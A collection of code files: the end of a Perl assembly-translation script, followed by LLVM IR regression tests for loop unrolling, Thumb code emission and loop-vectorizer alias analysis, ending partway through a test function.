s/\`([^\`]*)\`/eval $1/geo;
s/\bq([0-9]+)#(lo|hi)/sprintf "d%d",2*$1+($2 eq "hi")/geo;
print $_,"\n";
}
close STDOUT;
| {
"language": "Assembly"
} |
; RUN: opt < %s -loop-unroll -S | FileCheck %s
target datalayout = "e-m:o-i64:64-f80:128-n8:16:32:64-S128"
; This test shows how unrolling an inner loop could break LCSSA for an outer
; loop, and there is no cheap way to recover it.
;
; In this case the inner loop, L3, is being unrolled. It only runs one
; iteration, so unrolling basically means replacing
; br i1 true, label %exit, label %L3_header
; with
; br label %exit
;
; However, this change messes up the loops structure: for instance, block
; L3_body no longer belongs to L2. It becomes an exit block for L2, so LCSSA
; phis for definitions in L2 should now be placed there. In particular, we need
; to insert such a definition for %y1.
; CHECK-LABEL: @foo1
define void @foo1() {
entry:
br label %L1_header
L1_header:
br label %L2_header
L2_header:
%y1 = phi i64 [ undef, %L1_header ], [ %x.lcssa, %L2_latch ]
br label %L3_header
L3_header:
%y2 = phi i64 [ 0, %L3_latch ], [ %y1, %L2_header ]
%x = add i64 undef, -1
br i1 true, label %L2_latch, label %L3_body
L2_latch:
%x.lcssa = phi i64 [ %x, %L3_header ]
br label %L2_header
; CHECK: L3_body:
; CHECK-NEXT: %y1.lcssa = phi i64 [ %y1, %L3_header ]
L3_body:
store i64 %y1, i64* undef
br i1 false, label %L3_latch, label %L1_latch
L3_latch:
br i1 true, label %exit, label %L3_header
L1_latch:
%y.lcssa = phi i64 [ %y2, %L3_body ]
br label %L1_header
exit:
ret void
}
; Additional tests for some corner cases.
;
; CHECK-LABEL: @foo2
define void @foo2() {
entry:
br label %L1_header
L1_header:
br label %L2_header
L2_header:
%a = phi i64 [ undef, %L1_header ], [ %dec_us, %L3_header ]
br label %L3_header
L3_header:
%b = phi i64 [ 0, %L3_latch ], [ %a, %L2_header ]
%dec_us = add i64 undef, -1
br i1 true, label %L2_header, label %L3_break_to_L1
; CHECK: L3_break_to_L1:
; CHECK-NEXT: %a.lcssa = phi i64 [ %a, %L3_header ]
L3_break_to_L1:
br i1 false, label %L3_latch, label %L1_latch
L1_latch:
%b_lcssa = phi i64 [ %b, %L3_break_to_L1 ]
br label %L1_header
L3_latch:
br i1 true, label %Exit, label %L3_header
Exit:
ret void
}
; CHECK-LABEL: @foo3
define void @foo3() {
entry:
br label %L1_header
L1_header:
%a = phi i8* [ %b, %L1_latch ], [ null, %entry ]
br i1 undef, label %L2_header, label %L1_latch
L2_header:
br i1 undef, label %L2_latch, label %L1_latch
; CHECK: L2_latch:
; CHECK-NEXT: %a.lcssa = phi i8* [ %a, %L2_header ]
L2_latch:
br i1 true, label %L2_exit, label %L2_header
L1_latch:
%b = phi i8* [ undef, %L1_header ], [ null, %L2_header ]
br label %L1_header
L2_exit:
%a_lcssa1 = phi i8* [ %a, %L2_latch ]
br label %Exit
Exit:
%a_lcssa2 = phi i8* [ %a_lcssa1, %L2_exit ]
ret void
}
; PR26688
; CHECK-LABEL: @foo4
define i8 @foo4() {
entry:
br label %L1_header
L1_header:
%x = icmp eq i32 1, 0
br label %L2_header
L2_header:
br label %L3_header
L3_header:
br i1 true, label %L2_header, label %L3_exiting
L3_exiting:
br i1 true, label %L3_body, label %L1_latch
; CHECK: L3_body:
; CHECK-NEXT: %x.lcssa = phi i1
L3_body:
br i1 %x, label %L3_latch, label %L3_latch
L3_latch:
br i1 false, label %L3_header, label %exit
L1_latch:
br label %L1_header
exit:
ret i8 0
}
| {
"language": "Assembly"
} |
; RUN: llc < %s -mtriple=thumb | FileCheck %s
; CHECK: .code 16
define void @f() {
ret void
}
| {
"language": "Assembly"
} |
; RUN: opt < %s -O1 -loop-vectorize -force-vector-interleave=1 -force-vector-width=4 -dce -instcombine -S | FileCheck %s
target datalayout = "e-p:32:32:32-i1:8:8-i8:8:8-i16:16:16-i32:32:32-i64:64:64-f32:32:32-f64:64:64-v64:64:64-v128:64:128-a0:0:64-n32-S64"
%struct.anon = type { [100 x i32], i32, [100 x i32] }
%struct.anon.0 = type { [100 x [100 x i32]], i32, [100 x [100 x i32]] }
@Foo = common global %struct.anon zeroinitializer, align 4
@Bar = common global %struct.anon.0 zeroinitializer, align 4
@PB = external global i32*
@PA = external global i32*
;; === First, the tests that should always vectorize, whether statically or by adding run-time checks ===
; /// Different objects, positive induction, constant distance
; int noAlias01 (int a) {
; int i;
; for (i=0; i<SIZE; i++)
; Foo.A[i] = Foo.B[i] + a;
; return Foo.A[a];
; }
; CHECK-LABEL: define i32 @noAlias01(
; CHECK: add nsw <4 x i32>
; CHECK: ret
define i32 @noAlias01(i32 %a) nounwind {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32, i32* %i, align 4
%arrayidx = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 2), i32 0, i32 %1
%2 = load i32, i32* %arrayidx, align 4
%3 = load i32, i32* %a.addr, align 4
%add = add nsw i32 %2, %3
%4 = load i32, i32* %i, align 4
%arrayidx1 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %4
store i32 %add, i32* %arrayidx1, align 4
br label %for.inc
for.inc: ; preds = %for.body
%5 = load i32, i32* %i, align 4
%inc = add nsw i32 %5, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%6 = load i32, i32* %a.addr, align 4
%arrayidx2 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %6
%7 = load i32, i32* %arrayidx2, align 4
ret i32 %7
}
; /// Different objects, positive induction with widening slide
; int noAlias02 (int a) {
; int i;
; for (i=0; i<SIZE-10; i++)
; Foo.A[i] = Foo.B[i+10] + a;
; return Foo.A[a];
; }
; CHECK-LABEL: define i32 @noAlias02(
; CHECK: add nsw <4 x i32>
; CHECK: ret
define i32 @noAlias02(i32 %a) {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 90
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32, i32* %i, align 4
%add = add nsw i32 %1, 10
%arrayidx = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 2), i32 0, i32 %add
%2 = load i32, i32* %arrayidx, align 4
%3 = load i32, i32* %a.addr, align 4
%add1 = add nsw i32 %2, %3
%4 = load i32, i32* %i, align 4
%arrayidx2 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %4
store i32 %add1, i32* %arrayidx2, align 4
br label %for.inc
for.inc: ; preds = %for.body
%5 = load i32, i32* %i, align 4
%inc = add nsw i32 %5, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%6 = load i32, i32* %a.addr, align 4
%arrayidx3 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %6
%7 = load i32, i32* %arrayidx3, align 4
ret i32 %7
}
; /// Different objects, positive induction with shortening slide
; int noAlias03 (int a) {
; int i;
; for (i=0; i<SIZE; i++)
; Foo.A[i+10] = Foo.B[i] + a;
; return Foo.A[a];
; }
; CHECK-LABEL: define i32 @noAlias03(
; CHECK: add nsw <4 x i32>
; CHECK: ret
define i32 @noAlias03(i32 %a) {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32, i32* %i, align 4
%arrayidx = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 2), i32 0, i32 %1
%2 = load i32, i32* %arrayidx, align 4
%3 = load i32, i32* %a.addr, align 4
%add = add nsw i32 %2, %3
%4 = load i32, i32* %i, align 4
%add1 = add nsw i32 %4, 10
%arrayidx2 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %add1
store i32 %add, i32* %arrayidx2, align 4
br label %for.inc
for.inc: ; preds = %for.body
%5 = load i32, i32* %i, align 4
%inc = add nsw i32 %5, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%6 = load i32, i32* %a.addr, align 4
%arrayidx3 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %6
%7 = load i32, i32* %arrayidx3, align 4
ret i32 %7
}
; /// Pointer access, positive stride, run-time check added
; int noAlias04 (int a) {
; int i;
; for (i=0; i<SIZE; i++)
; *(PA+i) = *(PB+i) + a;
; return *(PA+a);
; }
; CHECK-LABEL: define i32 @noAlias04(
; CHECK-NOT: add nsw <4 x i32>
; CHECK: ret
;
; TODO: This test vectorizes (with run-time check) on real targets with -O3.
; Check why it's not being vectorized even when forcing vectorization.
define i32 @noAlias04(i32 %a) #0 {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32*, i32** @PB, align 4
%2 = load i32, i32* %i, align 4
%add.ptr = getelementptr inbounds i32, i32* %1, i32 %2
%3 = load i32, i32* %add.ptr, align 4
%4 = load i32, i32* %a.addr, align 4
%add = add nsw i32 %3, %4
%5 = load i32*, i32** @PA, align 4
%6 = load i32, i32* %i, align 4
%add.ptr1 = getelementptr inbounds i32, i32* %5, i32 %6
store i32 %add, i32* %add.ptr1, align 4
br label %for.inc
for.inc: ; preds = %for.body
%7 = load i32, i32* %i, align 4
%inc = add nsw i32 %7, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%8 = load i32*, i32** @PA, align 4
%9 = load i32, i32* %a.addr, align 4
%add.ptr2 = getelementptr inbounds i32, i32* %8, i32 %9
%10 = load i32, i32* %add.ptr2, align 4
ret i32 %10
}
; /// Different objects, positive induction, multi-array
; int noAlias05 (int a) {
; int i, N=10;
; for (i=0; i<SIZE; i++)
; Bar.A[N][i] = Bar.B[N][i] + a;
; return Bar.A[N][a];
; }
; CHECK-LABEL: define i32 @noAlias05(
; CHECK: add nsw <4 x i32>
; CHECK: ret
define i32 @noAlias05(i32 %a) #0 {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
%N = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 10, i32* %N, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32, i32* %i, align 4
%2 = load i32, i32* %N, align 4
%arrayidx = getelementptr inbounds [100 x [100 x i32]], [100 x [100 x i32]]* getelementptr inbounds (%struct.anon.0, %struct.anon.0* @Bar, i32 0, i32 2), i32 0, i32 %2
%arrayidx1 = getelementptr inbounds [100 x i32], [100 x i32]* %arrayidx, i32 0, i32 %1
%3 = load i32, i32* %arrayidx1, align 4
%4 = load i32, i32* %a.addr, align 4
%add = add nsw i32 %3, %4
%5 = load i32, i32* %i, align 4
%6 = load i32, i32* %N, align 4
%arrayidx2 = getelementptr inbounds [100 x [100 x i32]], [100 x [100 x i32]]* getelementptr inbounds (%struct.anon.0, %struct.anon.0* @Bar, i32 0, i32 0), i32 0, i32 %6
%arrayidx3 = getelementptr inbounds [100 x i32], [100 x i32]* %arrayidx2, i32 0, i32 %5
store i32 %add, i32* %arrayidx3, align 4
br label %for.inc
for.inc: ; preds = %for.body
%7 = load i32, i32* %i, align 4
%inc = add nsw i32 %7, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%8 = load i32, i32* %a.addr, align 4
%9 = load i32, i32* %N, align 4
%arrayidx4 = getelementptr inbounds [100 x [100 x i32]], [100 x [100 x i32]]* getelementptr inbounds (%struct.anon.0, %struct.anon.0* @Bar, i32 0, i32 0), i32 0, i32 %9
%arrayidx5 = getelementptr inbounds [100 x i32], [100 x i32]* %arrayidx4, i32 0, i32 %8
%10 = load i32, i32* %arrayidx5, align 4
ret i32 %10
}
; /// Same objects, positive induction, multi-array, different sub-elements
; int noAlias06 (int a) {
; int i, N=10;
; for (i=0; i<SIZE; i++)
; Bar.A[N][i] = Bar.A[N+1][i] + a;
; return Bar.A[N][a];
; }
; CHECK-LABEL: define i32 @noAlias06(
; CHECK: add nsw <4 x i32>
; CHECK: ret
define i32 @noAlias06(i32 %a) #0 {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
%N = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 10, i32* %N, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32, i32* %i, align 4
%2 = load i32, i32* %N, align 4
%add = add nsw i32 %2, 1
%arrayidx = getelementptr inbounds [100 x [100 x i32]], [100 x [100 x i32]]* getelementptr inbounds (%struct.anon.0, %struct.anon.0* @Bar, i32 0, i32 0), i32 0, i32 %add
%arrayidx1 = getelementptr inbounds [100 x i32], [100 x i32]* %arrayidx, i32 0, i32 %1
%3 = load i32, i32* %arrayidx1, align 4
%4 = load i32, i32* %a.addr, align 4
%add2 = add nsw i32 %3, %4
%5 = load i32, i32* %i, align 4
%6 = load i32, i32* %N, align 4
%arrayidx3 = getelementptr inbounds [100 x [100 x i32]], [100 x [100 x i32]]* getelementptr inbounds (%struct.anon.0, %struct.anon.0* @Bar, i32 0, i32 0), i32 0, i32 %6
%arrayidx4 = getelementptr inbounds [100 x i32], [100 x i32]* %arrayidx3, i32 0, i32 %5
store i32 %add2, i32* %arrayidx4, align 4
br label %for.inc
for.inc: ; preds = %for.body
%7 = load i32, i32* %i, align 4
%inc = add nsw i32 %7, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%8 = load i32, i32* %a.addr, align 4
%9 = load i32, i32* %N, align 4
%arrayidx5 = getelementptr inbounds [100 x [100 x i32]], [100 x [100 x i32]]* getelementptr inbounds (%struct.anon.0, %struct.anon.0* @Bar, i32 0, i32 0), i32 0, i32 %9
%arrayidx6 = getelementptr inbounds [100 x i32], [100 x i32]* %arrayidx5, i32 0, i32 %8
%10 = load i32, i32* %arrayidx6, align 4
ret i32 %10
}
; /// Different objects, negative induction, constant distance
; int noAlias07 (int a) {
; int i;
; for (i=0; i<SIZE; i++)
; Foo.A[SIZE-i-1] = Foo.B[SIZE-i-1] + a;
; return Foo.A[a];
; }
; CHECK-LABEL: define i32 @noAlias07(
; CHECK: store <4 x i32>
; CHECK: ret
define i32 @noAlias07(i32 %a) #0 {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32, i32* %i, align 4
%sub = sub nsw i32 100, %1
%sub1 = sub nsw i32 %sub, 1
%arrayidx = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 2), i32 0, i32 %sub1
%2 = load i32, i32* %arrayidx, align 4
%3 = load i32, i32* %a.addr, align 4
%add = add nsw i32 %2, %3
%4 = load i32, i32* %i, align 4
%sub2 = sub nsw i32 100, %4
%sub3 = sub nsw i32 %sub2, 1
%arrayidx4 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %sub3
store i32 %add, i32* %arrayidx4, align 4
br label %for.inc
for.inc: ; preds = %for.body
%5 = load i32, i32* %i, align 4
%inc = add nsw i32 %5, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%6 = load i32, i32* %a.addr, align 4
%arrayidx5 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %6
%7 = load i32, i32* %arrayidx5, align 4
ret i32 %7
}
; /// Different objects, negative induction, shortening slide
; int noAlias08 (int a) {
; int i;
; for (i=0; i<SIZE-10; i++)
; Foo.A[SIZE-i-1] = Foo.B[SIZE-i-10] + a;
; return Foo.A[a];
; }
; CHECK-LABEL: define i32 @noAlias08(
; CHECK: load <4 x i32>
; CHECK: ret
define i32 @noAlias08(i32 %a) #0 {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 90
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32, i32* %i, align 4
%sub = sub nsw i32 100, %1
%sub1 = sub nsw i32 %sub, 10
%arrayidx = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 2), i32 0, i32 %sub1
%2 = load i32, i32* %arrayidx, align 4
%3 = load i32, i32* %a.addr, align 4
%add = add nsw i32 %2, %3
%4 = load i32, i32* %i, align 4
%sub2 = sub nsw i32 100, %4
%sub3 = sub nsw i32 %sub2, 1
%arrayidx4 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %sub3
store i32 %add, i32* %arrayidx4, align 4
br label %for.inc
for.inc: ; preds = %for.body
%5 = load i32, i32* %i, align 4
%inc = add nsw i32 %5, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%6 = load i32, i32* %a.addr, align 4
%arrayidx5 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %6
%7 = load i32, i32* %arrayidx5, align 4
ret i32 %7
}
; /// Different objects, negative induction, widening slide
; int noAlias09 (int a) {
; int i;
; for (i=0; i<SIZE; i++)
; Foo.A[SIZE-i-10] = Foo.B[SIZE-i-1] + a;
; return Foo.A[a];
; }
; CHECK-LABEL: define i32 @noAlias09(
; CHECK: load <4 x i32>
; CHECK: ret
define i32 @noAlias09(i32 %a) #0 {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32, i32* %i, align 4
%sub = sub nsw i32 100, %1
%sub1 = sub nsw i32 %sub, 1
%arrayidx = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 2), i32 0, i32 %sub1
%2 = load i32, i32* %arrayidx, align 4
%3 = load i32, i32* %a.addr, align 4
%add = add nsw i32 %2, %3
%4 = load i32, i32* %i, align 4
%sub2 = sub nsw i32 100, %4
%sub3 = sub nsw i32 %sub2, 10
%arrayidx4 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %sub3
store i32 %add, i32* %arrayidx4, align 4
br label %for.inc
for.inc: ; preds = %for.body
%5 = load i32, i32* %i, align 4
%inc = add nsw i32 %5, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%6 = load i32, i32* %a.addr, align 4
%arrayidx5 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %6
%7 = load i32, i32* %arrayidx5, align 4
ret i32 %7
}
; /// Pointer access, negative stride, run-time check added
; int noAlias10 (int a) {
; int i;
; for (i=0; i<SIZE; i++)
; *(PA+SIZE-i-1) = *(PB+SIZE-i-1) + a;
; return *(PA+a);
; }
; CHECK-LABEL: define i32 @noAlias10(
; CHECK-NOT: sub {{.*}} <4 x i32>
; CHECK: ret
;
; TODO: This test vectorizes (with run-time check) on real targets with -O3.
; Check why it's not being vectorized even when forcing vectorization.
define i32 @noAlias10(i32 %a) #0 {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32*, i32** @PB, align 4
%add.ptr = getelementptr inbounds i32, i32* %1, i32 100
%2 = load i32, i32* %i, align 4
%idx.neg = sub i32 0, %2
%add.ptr1 = getelementptr inbounds i32, i32* %add.ptr, i32 %idx.neg
%add.ptr2 = getelementptr inbounds i32, i32* %add.ptr1, i32 -1
%3 = load i32, i32* %add.ptr2, align 4
%4 = load i32, i32* %a.addr, align 4
%add = add nsw i32 %3, %4
%5 = load i32*, i32** @PA, align 4
%add.ptr3 = getelementptr inbounds i32, i32* %5, i32 100
%6 = load i32, i32* %i, align 4
%idx.neg4 = sub i32 0, %6
%add.ptr5 = getelementptr inbounds i32, i32* %add.ptr3, i32 %idx.neg4
%add.ptr6 = getelementptr inbounds i32, i32* %add.ptr5, i32 -1
store i32 %add, i32* %add.ptr6, align 4
br label %for.inc
for.inc: ; preds = %for.body
%7 = load i32, i32* %i, align 4
%inc = add nsw i32 %7, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%8 = load i32*, i32** @PA, align 4
%9 = load i32, i32* %a.addr, align 4
%add.ptr7 = getelementptr inbounds i32, i32* %8, i32 %9
%10 = load i32, i32* %add.ptr7, align 4
ret i32 %10
}
; /// Different objects, negative induction, multi-array
; int noAlias11 (int a) {
; int i, N=10;
; for (i=0; i<SIZE; i++)
; Bar.A[N][SIZE-i-1] = Bar.B[N][SIZE-i-1] + a;
; return Bar.A[N][a];
; }
; CHECK-LABEL: define i32 @noAlias11(
; CHECK: store <4 x i32>
; CHECK: ret
define i32 @noAlias11(i32 %a) #0 {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
%N = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 10, i32* %N, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32, i32* %i, align 4
%sub = sub nsw i32 100, %1
%sub1 = sub nsw i32 %sub, 1
%2 = load i32, i32* %N, align 4
%arrayidx = getelementptr inbounds [100 x [100 x i32]], [100 x [100 x i32]]* getelementptr inbounds (%struct.anon.0, %struct.anon.0* @Bar, i32 0, i32 2), i32 0, i32 %2
%arrayidx2 = getelementptr inbounds [100 x i32], [100 x i32]* %arrayidx, i32 0, i32 %sub1
%3 = load i32, i32* %arrayidx2, align 4
%4 = load i32, i32* %a.addr, align 4
%add = add nsw i32 %3, %4
%5 = load i32, i32* %i, align 4
%sub3 = sub nsw i32 100, %5
%sub4 = sub nsw i32 %sub3, 1
%6 = load i32, i32* %N, align 4
%arrayidx5 = getelementptr inbounds [100 x [100 x i32]], [100 x [100 x i32]]* getelementptr inbounds (%struct.anon.0, %struct.anon.0* @Bar, i32 0, i32 0), i32 0, i32 %6
%arrayidx6 = getelementptr inbounds [100 x i32], [100 x i32]* %arrayidx5, i32 0, i32 %sub4
store i32 %add, i32* %arrayidx6, align 4
br label %for.inc
for.inc: ; preds = %for.body
%7 = load i32, i32* %i, align 4
%inc = add nsw i32 %7, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%8 = load i32, i32* %a.addr, align 4
%9 = load i32, i32* %N, align 4
%arrayidx7 = getelementptr inbounds [100 x [100 x i32]], [100 x [100 x i32]]* getelementptr inbounds (%struct.anon.0, %struct.anon.0* @Bar, i32 0, i32 0), i32 0, i32 %9
%arrayidx8 = getelementptr inbounds [100 x i32], [100 x i32]* %arrayidx7, i32 0, i32 %8
%10 = load i32, i32* %arrayidx8, align 4
ret i32 %10
}
; /// Same objects, negative induction, multi-array, different sub-elements
; int noAlias12 (int a) {
; int i, N=10;
; for (i=0; i<SIZE; i++)
; Bar.A[N][SIZE-i-1] = Bar.A[N+1][SIZE-i-1] + a;
; return Bar.A[N][a];
; }
; CHECK-LABEL: define i32 @noAlias12(
; CHECK: store <4 x i32>
; CHECK: ret
define i32 @noAlias12(i32 %a) #0 {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
%N = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 10, i32* %N, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32, i32* %i, align 4
%sub = sub nsw i32 100, %1
%sub1 = sub nsw i32 %sub, 1
%2 = load i32, i32* %N, align 4
%add = add nsw i32 %2, 1
%arrayidx = getelementptr inbounds [100 x [100 x i32]], [100 x [100 x i32]]* getelementptr inbounds (%struct.anon.0, %struct.anon.0* @Bar, i32 0, i32 0), i32 0, i32 %add
%arrayidx2 = getelementptr inbounds [100 x i32], [100 x i32]* %arrayidx, i32 0, i32 %sub1
%3 = load i32, i32* %arrayidx2, align 4
%4 = load i32, i32* %a.addr, align 4
%add3 = add nsw i32 %3, %4
%5 = load i32, i32* %i, align 4
%sub4 = sub nsw i32 100, %5
%sub5 = sub nsw i32 %sub4, 1
%6 = load i32, i32* %N, align 4
%arrayidx6 = getelementptr inbounds [100 x [100 x i32]], [100 x [100 x i32]]* getelementptr inbounds (%struct.anon.0, %struct.anon.0* @Bar, i32 0, i32 0), i32 0, i32 %6
%arrayidx7 = getelementptr inbounds [100 x i32], [100 x i32]* %arrayidx6, i32 0, i32 %sub5
store i32 %add3, i32* %arrayidx7, align 4
br label %for.inc
for.inc: ; preds = %for.body
%7 = load i32, i32* %i, align 4
%inc = add nsw i32 %7, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%8 = load i32, i32* %a.addr, align 4
%9 = load i32, i32* %N, align 4
%arrayidx8 = getelementptr inbounds [100 x [100 x i32]], [100 x [100 x i32]]* getelementptr inbounds (%struct.anon.0, %struct.anon.0* @Bar, i32 0, i32 0), i32 0, i32 %9
%arrayidx9 = getelementptr inbounds [100 x i32], [100 x i32]* %arrayidx8, i32 0, i32 %8
%10 = load i32, i32* %arrayidx9, align 4
ret i32 %10
}
; /// Same objects, positive induction, constant distance, just enough for vector size
; int noAlias13 (int a) {
; int i;
; for (i=0; i<SIZE; i++)
; Foo.A[i] = Foo.A[i+4] + a;
; return Foo.A[a];
; }
; CHECK-LABEL: define i32 @noAlias13(
; CHECK: add nsw <4 x i32>
; CHECK: ret
define i32 @noAlias13(i32 %a) #0 {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32, i32* %i, align 4
%add = add nsw i32 %1, 4
%arrayidx = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %add
%2 = load i32, i32* %arrayidx, align 4
%3 = load i32, i32* %a.addr, align 4
%add1 = add nsw i32 %2, %3
%4 = load i32, i32* %i, align 4
%arrayidx2 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %4
store i32 %add1, i32* %arrayidx2, align 4
br label %for.inc
for.inc: ; preds = %for.body
%5 = load i32, i32* %i, align 4
%inc = add nsw i32 %5, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
